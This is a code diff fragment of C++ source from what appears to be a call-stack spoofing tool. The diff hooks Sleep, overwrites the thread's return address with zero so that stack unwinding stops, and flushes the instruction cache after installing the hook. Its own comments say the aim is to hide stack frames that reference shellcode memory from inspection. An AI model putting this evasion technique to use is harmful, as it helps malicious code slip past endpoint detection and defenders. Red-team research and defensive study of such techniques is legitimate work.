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  • ■ ■ ■ ■ ■ ■
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    10 10   DWORD dwMilis
    11 11   );
    12 12   
     13 +typedef DWORD(NTAPI* typeNtFlushInstructionCache)(
     14 + HANDLE ProcessHandle,
     15 + PVOID BaseAddress,
     16 + ULONG NumberOfBytesToFlush
     17 + );
     18 + 
    13 19  typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::CloseHandle)> HandlePtr;
    14 20   
    15 21  struct HookedSleep
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  • ■ ■ ■ ■ ■ ■
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    9 9  {
    10 10   const register DWORD dwMilliseconds = _dwMilliseconds;
    11 11   
    12  - // Perform this (current) thread call stack spoofing.
     12 + //
     13 + // Locate this stack frame's return address.
     14 + //
    13 15   PULONG_PTR overwrite = (PULONG_PTR)_AddressOfReturnAddress();
    14 16   const register ULONG_PTR origReturnAddress = *overwrite;
    15 17   
    16  - log("[>] Original return address: 0x", std::hex, std::setw(8), std::setfill('0'), origReturnAddress, ". Finishing call stack...");
     18 + log("[>] Original return address: 0x",
     19 + std::hex, std::setw(8), std::setfill('0'), origReturnAddress,
     20 + ". Finishing call stack...");
     21 + 
     22 + //
     23 + // By overwriting the return address with 0 we're basically telling call stack unwinding algorithm
     24 + // to stop unwinding call stack any further, as there further frames. This we can hide our remaining stack frames
     25 + // referencing shellcode memory allocation from residing on a call stack.
     26 + //
    17 27   *overwrite = 0;
    18 28   
    19 29   log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
    skipped 72 lines
    92 102   output = true;
    93 103   }
    94 104   }
     105 + 
     106 + static typeNtFlushInstructionCache pNtFlushInstructionCache = NULL;
     107 + if (!pNtFlushInstructionCache)
     108 + pNtFlushInstructionCache = (typeNtFlushInstructionCache)
     109 + GetProcAddress(GetModuleHandleA("ntdll"), "NtFlushInstructionCache");
     110 + 
     111 + //
     112 + // We're flushing instructions cache just in case our hook didn't kick in immediately.
     113 + //
     114 + if (pNtFlushInstructionCache)
     115 + pNtFlushInstructionCache(GetCurrentProcess(), addressToHook, dwSize);
    95 116   
    96 117   ::VirtualProtect(
    97 118   addressToHook,
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